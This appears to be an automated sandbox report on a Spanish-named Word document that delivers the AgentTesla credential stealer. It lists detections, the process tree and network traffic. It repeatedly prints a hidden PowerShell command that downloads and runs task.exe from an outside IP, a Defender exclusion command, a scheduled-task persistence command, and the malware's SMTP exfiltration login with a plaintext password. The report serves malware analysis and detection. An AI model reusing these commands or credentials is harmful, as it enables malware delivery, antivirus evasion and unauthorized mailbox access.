
Windows Analysis Report PAGO DEL SALDO.doc

Overview

General Information

Sample Name:PAGO DEL SALDO.doc
Analysis ID:528739
MD5:1956fa2feaef4b6fcf3e63f51aa26722
SHA1:b35003f1c1a874468dbe41370cea443aafb10915
SHA256:1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
Tags:doc

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Sigma detected: Powershell download and execute file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Microsoft Office creates scripting files
Installs a global keyboard hook
Office process drops PE file
Injects files into Windows application
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Sigma detected: Powershell Defender Exclusion
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sigma detected: Verclsid.exe Runs COM Object
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • task.exe (PID: 2780 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: F65B0793251364C03D06E8E7134FC21B)
        • powershell.exe (PID: 2732 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1912 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • task.exe (PID: 572 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: F65B0793251364C03D06E8E7134FC21B)
    • powershell.exe (PID: 2800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 324 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 2844 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 1868 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp | Rule: PowerShell_Susp_Parameter_Combo | Description: Detects PowerShell invocation with suspicious parameters | Author: Florian Roth
  Strings:
  • 0x325b:$sb1: -W Hidden
  • 0x324b:$sc1: -NoP
  • 0x3255:$sd1: -NonI
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x3250:$sf1: -sta

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 14.0.task.exe.400000.11.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.task.exe.400000.11.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.task.exe.400000.5.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.task.exe.400000.5.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.task.exe.400000.13.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started; Author: frack113; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
Sigma detected: PowerShell DownloadFile
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, ProcessId: 1912
Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, ProcessId: 2732
Sigma detected: Verclsid.exe Runs COM Object
Source: Process started; Author: Victor Sergeev, oscd.community; Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2844
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
Sigma detected: PowerShell Download from URL
Source: Process started; Author: Florian Roth, oscd.community, Jonhnathan Ribeiro; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Data Obfuscation:

Sigma detected: Powershell download and execute file
Source: Process started; Author: Joe Security; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 14.0.task.exe.400000.13.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}
Source: 14.0.task.exe.400000.13.unpack; Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.5.unpack; Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.11.unpack; Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.7.unpack; Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.9.unpack; Avira: Label: TR/Spy.Gen8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: task[1].exe.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80
Source: global traffic; DNS query: name: us2.smtp.mailhostbox.com
Source: C:\Users\user\AppData\Roaming\task.exe; Code function: 4x nop then jmp 05271471h
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.198.143:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 208.91.198.143:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.198.143:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49175 -> 208.91.198.143:587
Source: global traffic; HTTP traffic detected: GET /task.exe HTTP/1.1; Host: 173.232.204.89; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.19.9; Date: Thu, 25 Nov 2021 17:21:19 GMT; Content-Type: application/octet-stream; Content-Length: 504832; Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT; Connection: keep-alive; ETag: "619f6afa-7b400"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.19.9; Date: Thu, 25 Nov 2021 17:21:28 GMT; Content-Type: application/octet-stream; Content-Length: 504832; Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT; Connection: keep-alive; ETag: "619f6afa-7b400"; Accept-Ranges: bytes
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 0
